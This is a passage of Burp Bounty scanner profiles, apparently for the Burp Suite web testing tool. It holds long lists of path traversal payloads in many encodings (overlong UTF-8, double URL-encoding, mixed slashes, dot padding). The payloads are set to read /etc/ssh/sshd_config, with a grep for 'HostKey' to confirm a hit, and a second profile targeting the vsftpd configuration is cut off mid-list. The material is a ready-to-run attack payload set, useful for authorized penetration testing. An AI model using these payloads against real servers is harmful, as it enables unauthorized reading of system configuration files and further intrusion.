"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,HostKey"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-sshd-conf",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-sshd-conf",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/ssh/sshd_config",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-vsftpd-conf.bb | [
{
"ProfileName": "Linux-vsftpd-conf",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
